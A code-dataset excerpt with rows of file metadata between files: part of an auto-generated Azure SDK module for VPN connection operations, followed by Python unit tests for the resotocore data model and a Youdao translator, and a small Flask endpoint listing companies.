:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VpnConnection or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2018_04_01.models.VpnConnection or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def _create_or_update_initial(
self, resource_group_name, gateway_name, connection_name, vpn_connection_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(vpn_connection_parameters, 'VpnConnection')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnConnection', response)
if response.status_code == 201:
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, gateway_name, connection_name, vpn_connection_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a vpn connection to a scalable vpn gateway if it doesn't exist
else updates the existing connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the connection.
:type connection_name: str
:param vpn_connection_parameters: Parameters supplied to create or
Update a VPN Connection.
:type vpn_connection_parameters:
~azure.mgmt.network.v2018_04_01.models.VpnConnection
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VpnConnection or
ClientRawResponse<VpnConnection> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2018_04_01.models.VpnConnection]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2018_04_01.models.VpnConnection]]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
connection_name=connection_name,
vpn_connection_parameters=vpn_connection_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VpnConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def _delete_initial(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, gateway_name, connection_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a vpn connection.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param connection_name: The name of the connection.
:type connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
connection_name=connection_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections/{connectionName}'}
def list_by_vpn_gateway(
self, resource_group_name, gateway_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves all vpn connections for a particular virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VpnConnection
:rtype:
~azure.mgmt.network.v2018_04_01.models.VpnConnectionPaged[~azure.mgmt.network.v2018_04_01.models.VpnConnection]
:raises:
:class:`ErrorException<azure.mgmt.network.v2018_04_01.models.ErrorException>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_vpn_gateway.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.VpnConnectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_by_vpn_gateway.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/vpnConnections'}
| 47.770492 | 195 | 0.67822 |
01323c9f4e0ae37129caf5ce3ccefeae1da5a6b1 | 22,566 | py | Python | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 126 | 2022-01-13T18:22:03.000Z | 2022-03-31T11:03:14.000Z | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 110 | 2022-01-13T22:27:55.000Z | 2022-03-30T22:26:50.000Z | resotocore/tests/resotocore/model/model_test.py | someengineering/resoto | ee17313f5376e9797ed305e7fdb62d40139a6608 | [
"Apache-2.0"
] | 8 | 2022-01-15T10:28:16.000Z | 2022-03-30T16:38:21.000Z | import json
from datetime import datetime, timedelta
from textwrap import dedent
from typing import Type, Any, Union, cast, List
import pytest
import yaml
from deepdiff import DeepDiff
from hypothesis import HealthCheck, settings, given
from networkx import DiGraph
from resotocore.cli.model import CLIContext
from resotocore.console_renderer import ConsoleRenderer, ConsoleColorSystem
from resotocore.model.model import (
StringKind,
Kind,
NumberKind,
BooleanKind,
DateKind,
DateTimeKind,
ArrayKind,
Property,
ComplexKind,
Model,
DictionaryKind,
predefined_kinds,
PropertyPath,
TransformKind,
DurationKind,
SyntheticProperty,
)
from resotocore.model.typed_model import to_json, from_js
from resotocore.types import Json
from resotocore.util import from_utc, utc, utc_str
from tests.resotocore.hypothesis_extension import json_object_gen
def test_json_marshalling() -> None:
roundtrip(StringKind("string"), Kind)
roundtrip(StringKind("string", 5, 13, "foo.*bla"), Kind)
roundtrip(StringKind("string", enum={"foo", "bla"}), Kind)
roundtrip(NumberKind("num", "int32", minimum=2, maximum=34), Kind)
roundtrip(NumberKind("num", "int64", enum={1, 2}), Kind)
roundtrip(BooleanKind("b"), Kind)
roundtrip(DateKind("d"), Kind)
roundtrip(DateTimeKind("d"), Kind)
roundtrip(DurationKind("duration"), Kind)
roundtrip(TransformKind("synth", "duration", "datetime", "duration_to_datetime", True), Kind)
roundtrip(ArrayKind(StringKind("string")), Kind)
roundtrip(Property("foo", "foo"), Property)
roundtrip(Property("age", "trafo.duration_to_datetime", False, SyntheticProperty(["ctime"])), Property)
roundtrip(
ComplexKind(
"Test",
["Base"],
[
Property("array", "string[]"),
Property("s", "float"),
Property("i", "int32"),
Property("other", "SomeComposite"),
],
),
Kind,
)
def test_string() -> None:
a = StringKind("string", 5, 13, "foo.*bla")
assert expect_error(a, "foo") == ">foo< does not conform to regex: foo.*bla"
assert expect_error(a, "fooooo") == ">fooooo< does not conform to regex: foo.*bla"
assert a.check_valid("fooooobla") is None
assert expect_error(a, "fooooooooooobla") == ">fooooooooooobla< is too long! Allowed: 13"
b = StringKind("string", enum={"foo", "bla", "bar"})
assert b.check_valid("foo") is None
assert expect_error(b, "baz").startswith(">baz< should be one of")
def test_number() -> None:
int32 = NumberKind("cores", "int32", 1, 8)
flot = NumberKind("test", "float", 1, 8)
assert int32.coerce_if_required(1) is None
assert int32.coerce_if_required(None) is None
assert int32.coerce_if_required("no number") is None
assert int32.check_valid(1) is None
assert int32.check_valid(8) is None
assert int32.check_valid("8") is 8
assert expect_error(int32, "7.123") == "Expected type int32 but got str"
assert flot.check_valid("7.123") == 7.123
assert expect_error(int32, 0) == ">0< should be greater or equals than: 1"
assert expect_error(int32, 9) == ">9< should be smaller or equals than: 8"
assert expect_error(int32, "9") == ">9< should be smaller or equals than: 8"
b = NumberKind("bin", "int32", enum={1, 2, 4})
assert b.check_valid(1) is None
assert expect_error(b, 3) == ">3< should be one of: {1, 2, 4}"
def test_boolean() -> None:
a = BooleanKind("question")
assert a.coerce_if_required(True) is None
assert a.coerce_if_required(None) is None
assert a.coerce_if_required("no bool") is None
assert a.check_valid(True) is None
assert a.check_valid(False) is None
assert a.check_valid("true") is True
assert a.check_valid("false") is False
assert a.check_valid("FALSE") is False
assert expect_error(a, "test").startswith("Expected type boolean but got")
def test_duration() -> None:
a = DurationKind("dt")
assert a.check_valid("3d5h6min3s") is None
assert expect_error(a, True) == "Expected type duration but got bool"
assert (
expect_error(a, "23df") == "Wrong format for duration: 23df. Examples: 1yr, 3mo, 3d4h3min1s, 3days and 2hours"
)
assert a.coerce_if_required("12d") == "1036800s"
with pytest.raises(AttributeError) as no_date:
a.check_valid("simply no duration")
assert (
str(no_date.value)
== "Wrong format for duration: simply no duration. Examples: 1yr, 3mo, 3d4h3min1s, 3days and 2hours"
)
def test_transform() -> None:
age = TransformKind("dt", "duration", "datetime", "duration_to_datetime", True)
age.resolve({"duration": DurationKind("duration"), "datetime": DateTimeKind("datetime")})
with pytest.raises(AttributeError):
age.check_valid("3s") # check valid is not allowed on synthetic values (they do not get imported!)
# age transforms a duration into a timestamp before now
one_day_old = from_utc(age.coerce_if_required("1d")) # type: ignore
# difference between 1d and computed utc-24h should be less than 2 seconds (depending on test env less)
assert (one_day_old - (utc() - timedelta(hours=24))).total_seconds() <= 2
# transform back from underlying timestamp to timedelta
assert age.transform(utc_str(utc() - timedelta(seconds=123))) == "2min3s"
assert age.transform(utc_str(utc() - timedelta(seconds=123456))) == "1d10h"
assert age.transform(utc_str(utc() - timedelta(seconds=1234567))) == "14d6h"
assert age.transform(utc_str(utc() - timedelta(seconds=123456789))) == "3yr10mo"
def test_datetime() -> None:
a = DateTimeKind("dt")
assert a.check_valid("2021-06-08T08:56:15Z") is None
assert a.check_valid("2021-06-08T08:56:15+00:00") == "2021-06-08T08:56:15Z"
assert expect_error(a, True) == "Expected type datetime but got bool"
assert a.coerce_if_required(None) is None
assert a.coerce_if_required("no datetime") is None
assert a.coerce_if_required("2021-06-08T08") is not None
assert a.coerce_if_required("2021-06-08T08:56:15Z") is None
assert a.coerce_if_required("2021-06-08T08:56:15.0000+00:00") == "2021-06-08T08:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000+02:00") == "2021-06-08T06:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000-02:00") == "2021-06-08T10:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000+0000") == "2021-06-08T08:56:15Z"
assert a.coerce_if_required("2021-06-08 08:56:15").startswith("2021-06-08T") # type: ignore
assert a.coerce_if_required("2021-06-08 08:56:15").endswith(":56:15Z") # type: ignore # ignore the hours, time zone dependant
today = datetime.today().replace(hour=6, minute=56, second=15).strftime(DateTimeKind.Format)
assert a.coerce_if_required("08:56:15").startswith(today[0:11]) # type: ignore
assert a.coerce_if_required("08:56:15").endswith(":56:15Z") # type: ignore# ignore the hours, time zone dependant
assert a.coerce_if_required("-12d").startswith("20") # type: ignore
assert a.coerce_if_required("12mo").startswith("20") # type: ignore
with pytest.raises(Exception) as no_date:
a.check_valid("simply no date")
assert str(no_date.value) == f"Invalid isoformat string: 'simply no date'"
def test_date() -> None:
a = DateKind("d")
assert a.check_valid("2021-06-08") is None
assert expect_error(a, True) == "Expected type date but got bool"
assert a.coerce_if_required("2021-06-08") == "2021-06-08"
assert a.coerce_if_required("2021 06 08") == "2021-06-08"
assert a.coerce_if_required("-12d").startswith("20") # type: ignore
assert a.coerce_if_required("12mo").startswith("20") # type: ignore
with pytest.raises(Exception) as no_date:
a.check_valid("simply no date")
assert str(no_date.value) == f"Invalid isoformat string: 'simply no date'"
def test_dictionary() -> None:
model = {k.fqn: k for k in predefined_kinds}
result = Property.parse_kind("dictionary[string, string]", model)
assert isinstance(result, DictionaryKind)
assert result.key_kind is model["string"]
assert result.value_kind is model["string"]
result = Property.parse_kind("dictionary[string, dictionary[string, float]]", model)
assert isinstance(result, DictionaryKind)
assert result.key_kind is model["string"]
assert result.value_kind == DictionaryKind(model["string"], model["float"])
address = ComplexKind(
"Foo", [], [Property("tags", "dictionary[string, string]"), Property("anything", "dictionary[string, any]")]
)
address_model = Model.from_kinds([address])
assert address_model.check_valid({"kind": "Foo", "tags": {"a": "b", "b": "c"}}) is None
assert address_model.check_valid({"kind": "Foo", "tags": {"a": 1, "b": "c"}}) is not None
assert address_model.check_valid({"kind": "Foo", "anything": {"a": 1, "b": "c", "c": True}}) is None
expected = 'Kind:Foo Property:anything is not valid: dictionary requires a json object, but got this: 1: {"kind": "Foo", "anything": 1}'
assert expect_error(address_model, {"kind": "Foo", "anything": 1}) == expected
def test_any() -> None:
model = Model.from_kinds(predefined_kinds)
assert model.check_valid({"kind": "any", "a": True, "b": 12, "c": [], "d": {"a": "b"}}) is None
def test_array() -> None:
foo = ComplexKind("Foo", [], [Property("tags", "dictionary[string, string]"), Property("kind", "string")])
complex_kind = ComplexKind(
"TestArray",
[],
[
Property("kind", "string"),
Property("los", "string[]"),
Property("lod", "dictionary[string, string][]"),
Property("foos", "Foo[]"),
Property("los_los", "string[][]"),
Property("los_los_los", "string[][][]"),
],
)
model = Model.from_kinds([foo, complex_kind])
assert (
model.check_valid(
{
"kind": "TestArray",
"los": ["a", "b", "c"],
"lod": [{"a": "b"}, {"b": "c"}],
"foos": [{"kind": "Foo", "tags": {"a": "b"}}, {"kind": "Foo", "tags": {"b": "c"}}],
"los_los": [["a", "b"], ["c"], ["d", "e"]],
"los_los_los": [[["a", "b"], ["c"]], [["d", "e"], ["f"]]],
}
)
is None
)
def test_model_checking(person_model: Model) -> None:
assert person_model.check_valid({"kind": "Base", "id": "32"}) is None
assert person_model.check_valid({"kind": "Base", "id": "32", "list": ["one", "two"]}) is None
assert person_model.check_valid({"kind": "Base", "id": "32", "list": [1, 2]})["list"] == ["1", "2"] # type: ignore
expected = 'Kind:Base Property:list is not valid: Expected property is a json object not an array!: {"kind": "Base", "id": "32", "list": {"not": "an array"}}'
assert expect_error(person_model, {"kind": "Base", "id": "32", "list": {"not": "an array"}}) == expected
assert person_model.check_valid({"kind": "Base", "id": 32}) == {"kind": "Base", "id": "32"}
expected = 'Kind:Base Property:id is required and missing in {"kind": "Base"}'
assert expect_error(person_model, {"kind": "Base"}) == expected
expected = "Kind:Base Property:unknown is not defined in model!"
assert expect_error(person_model, {"kind": "Base", "id": "bla", "unknown": 1}) == expected
expected = (
'Kind:Address Property:id is required and missing in {"kind": "Address", "zip": "12345", "city": "gotham"}'
)
assert expect_error(person_model, {"kind": "Address", "zip": "12345", "city": "gotham"}) == expected
nested = {
"id": "batman",
"kind": "Person",
"name": "batman",
"address": {"kind": "Address", "id": "foo", "city": "gotham"},
}
assert person_model.check_valid(nested) is None
nested = {"id": "batman", "kind": "Person", "name": "batman", "address": {"kind": "Address", "city": "gotham"}}
expected = 'Kind:Person Property:address is not valid: Kind:Address Property:id is required and missing in {"kind": "Address", "city": "gotham"}: {"id": "batman", "kind": "Person", "name": "batman", "address": {"kind": "Address", "city": "gotham"}}'
assert expect_error(person_model, nested) == expected
assert person_model.check_valid({"kind": "Base", "id": "32", "mtime": "2008-09-03T20:56:35+20:00"})["mtime"] == "2008-09-03T00:56:35Z" # type: ignore
anything = {"kind": "any", "some": [1, 2, 3], "not": "defined", "props": True}
assert person_model.check_valid(anything) is None
any_foo = {"kind": "any_foo", "id": "foo", "foo": {"a": [1, 2, 3]}, "test": "hallo"}
assert person_model.check_valid(any_foo) is None
def test_property_path() -> None:
p1 = PropertyPath(["a", None, "c", None])
p2 = PropertyPath(["a", "b", "c", "d"])
p3 = PropertyPath(["a", "b"])
p4 = p3.child("c").child("d")
assert p1.same_as(p2)
assert p2.same_as(p1)
assert not p1.same_as(p3)
assert p2.same_as(p4)
def test_property_path_on_model(person_model: Model) -> None:
# complex based property path
person: ComplexKind = cast(ComplexKind, person_model["Person"])
person_path = {p.path: p for p in person.resolved_properties()}
assert len(person_path) == 13
assert person_path[PropertyPath(["name"])].kind == person_model["string"]
assert person_path[PropertyPath(["name"])].prop.name == "name"
assert person_path[PropertyPath(["list[]"])].kind == person_model["string"]
assert person_path[PropertyPath(["list[]"])].prop.name == "list"
assert person_path[PropertyPath(["tags", None])].kind == person_model["string"]
assert person_path[PropertyPath(["address", "zip"])].kind == person_model["zip"]
assert person_path[PropertyPath(["address", "zip"])].prop.name == "zip"
with pytest.raises(KeyError):
_ = person_path[PropertyPath(["anything"])]
# model based property path
assert person_model.kind_by_path("name") == person_model["string"]
assert person_model.kind_by_path("list[]") == person_model["string"]
assert person_model.kind_by_path("tags.foo") == person_model["string"]
assert person_model.kind_by_path("tags.bla") == person_model["string"]
assert person_model.kind_by_path("other_addresses.bla.zip") == person_model["zip"]
assert person_model.kind_by_path("address.zip") == person_model["zip"]
def test_update(person_model: Model) -> None:
with pytest.raises(AttributeError) as not_allowed: # update city with different type
person_model.update_kinds(
[
ComplexKind(
"Address",
["Base"],
[
Property("city", "int32", required=True),
],
)
]
)
assert (
str(not_allowed.value)
== "Update not possible: following properties would be non unique having the same path but different type: "
"Address.city (string -> int32)"
)
updated = person_model.update_kinds([StringKind("Foo")])
assert updated["Foo"].fqn == "Foo"
with pytest.raises(AttributeError) as simple:
updated.update_kinds([ComplexKind("Foo", [], [])])
assert str(simple.value) == "Update Foo changes an existing property type Foo"
with pytest.raises(AttributeError) as duplicate:
updated.update_kinds([ComplexKind("Bla", [], [Property("id", "int32")])])
assert (
str(duplicate.value)
== "Update not possible: following properties would be non unique having the same path but different type: "
"Bla.id (string -> int32)"
)
def test_load(model_json: str) -> None:
kinds: List[Kind] = [from_js(a, Kind) for a in json.loads(model_json)] # type: ignore
model = Model.from_kinds(kinds)
assert model.check_valid({"kind": "test.EC2", "id": "e1", "name": "e1", "cores": 1, "mem": 32, "tags": {}}) is None
base: ComplexKind = model["test.Base"] # type: ignore
ec2: ComplexKind = model["test.EC2"] # type: ignore
assert ec2.kind_hierarchy() == {"test.Compound", "test.BaseResource", "test.Base", "test.EC2"}
assert ec2.allow_unknown_props is True
assert base.allow_unknown_props is False
def test_graph(person_model: Model) -> None:
graph: DiGraph = person_model.graph()
assert len(graph.nodes()) == 11
assert len(graph.edges()) == 8
def roundtrip(obj: Any, clazz: Type[object]) -> None:
js = to_json(obj)
again = from_js(js, clazz)
assert type(obj) == type(again)
assert DeepDiff(obj, again) == {}, f"Json: {js} serialized as {again}"
def expect_error(kind: Union[Kind, Model], obj: Any) -> str:
try:
kind.check_valid(obj)
raise Exception("Expected an error but got a result!")
except Exception as a:
return str(a)
@pytest.fixture
def person_model() -> Model:
zip = StringKind("zip")
base = ComplexKind(
"Base",
[],
[
Property("id", "string", required=True, description="Some identifier"),
Property("kind", "string", required=True, description="Kind if this node."),
Property("list", "string[]", description="A list of strings."),
Property("tags", "dictionary[string, string]", description="Key/value pairs."),
Property("mtime", "datetime", description="Modification time of this node."),
],
)
address = ComplexKind(
"Address",
["Base"],
[
Property("zip", "zip", description="The zip code."),
Property("city", "string", required=True, description="The name of the city.\nAnd another line."),
],
)
person = ComplexKind(
"Person",
["Base"],
[
Property("name", "string", description="The name of the person."),
Property("address", "Address", description="The address of the person."),
Property("other_addresses", "dictionary[string, Address]", description="Other addresses."),
Property("addresses", "Address[]", description="The list of addresses."),
Property("any", "any", description="Some arbitrary value."),
],
)
any_foo = ComplexKind(
"any_foo",
["Base"],
[
Property("foo", "any", description="Some foo value."),
Property("test", "string", description="Some test value."),
],
)
cloud = ComplexKind("cloud", ["Base"], [])
account = ComplexKind("account", ["Base"], [])
region = ComplexKind("region", ["Base"], [])
parent = ComplexKind("parent", ["Base"], [])
child = ComplexKind("child", ["Base"], [])
return Model.from_kinds([zip, person, address, base, any_foo, cloud, account, region, parent, child])
@pytest.fixture
def model_json() -> str:
return """
[
{
"fqn": "test.Compound",
"properties": [
{ "name": "kind", "kind": "string", "required": true, "description": "The kind of this compound type." }
]
},
{
"fqn": "test.Base",
"properties": [
{ "name": "tags", "kind": "dictionary[string, string]", "description": "Tags that describe the resource.", "required": false }
]
},
{ "fqn" : "test.BaseResource",
"bases": ["test.Compound", "test.Base"],
"properties": [
{ "name": "id", "kind": "string", "description": "The identifier of this resource", "required": true },
{ "name": "name", "kind": "string", "description": "The name of the resource.", "required": true }
]
},
{ "fqn" : "test.EC2",
"bases": ["test.BaseResource"],
"allow_unknown_props": true,
"properties": [
{ "name": "mem", "kind": "int32", "description": "The amount of bytes", "required": true },
{ "name": "cores", "kind": "int32", "description": "The amount of cores", "required": true }
]
}
]
"""
def test_markup() -> None:
ctx = CLIContext(console_renderer=ConsoleRenderer(color_system=ConsoleColorSystem.monochrome))
md = dedent(
"""
- b1 test
- b2 fox
- test
"""
)
result = ctx.render_console(md)
assert len(result) > len(md)
assert "• b1 test" in result
def test_yaml(person_model: Model) -> None:
person_kind: ComplexKind = person_model["Person"] # type: ignore
address = {"zip": "134", "city": "gotham", "number": 123, "float": 1.2345}
person = {
"name": "batman",
"address": address,
"addresses": [address, address],
"other_addresses": {"home": address, "work": address},
"simple": [1, 2, 3, 4, 5, True, False, None],
}
assert person_kind.create_yaml(person) == dedent(
"""
# The name of the person.
name: 'batman'
# The address of the person.
address:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
# The list of addresses.
addresses:
- # The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
- # The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
# Other addresses.
other_addresses:
home:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
work:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
simple:
- 1
- 2
- 3
- 4
- 5
- true
- false
- null
""".rstrip()
)
assert person == yaml.safe_load(person_kind.create_yaml(person))
@given(json_object_gen)
@settings(max_examples=50, suppress_health_check=HealthCheck.all())
def test_yaml_generation(js: Json) -> None:
kind = ComplexKind("test", [], [])
assert js == yaml.safe_load(kind.create_yaml(js))
| 41.254113 | 253 | 0.607507 |
3e72f5219497b21c72cbdee85ee289e7230e3e9d | 572 | py | Python | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | 1 | 2020-07-04T05:56:01.000Z | 2020-07-04T05:56:01.000Z | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | null | null | null | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | null | null | null | import unittest
from translate.factory import get_translator
youdao = get_translator('youdao')
class YoudaoTest(unittest.TestCase):
def test_query(self):
youdao.query('hello')
self.assertTrue('发音' in youdao.format())
self.assertTrue('helˈō' in youdao.format())
self.assertTrue('həˈləʊ' in youdao.format())
self.assertTrue('英汉翻译' in youdao.format())
self.assertTrue('表示问候, 惊奇或唤起注意时的用语' in youdao.format())
self.assertTrue('网络释义' in youdao.format(1))
self.assertTrue('Hello Kitty' in youdao.format(1))
| 31.777778 | 63 | 0.678322 |
42d4231a6aad92e9cbd5ce66e09d393e60e738c9 | 392 | py | Python | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | from api import app
from api import database
from flask import jsonify
@app.route('/companies', methods=['GET'])
def read_companies():
"""Read all companies"""
# Read all companies from DB
db = database()
companies_list = []
for key,value in db.items():
companies_list.append({key: value})
# Return company as JSON
return jsonify(companies=companies_list) | 28 | 44 | 0.683673 |
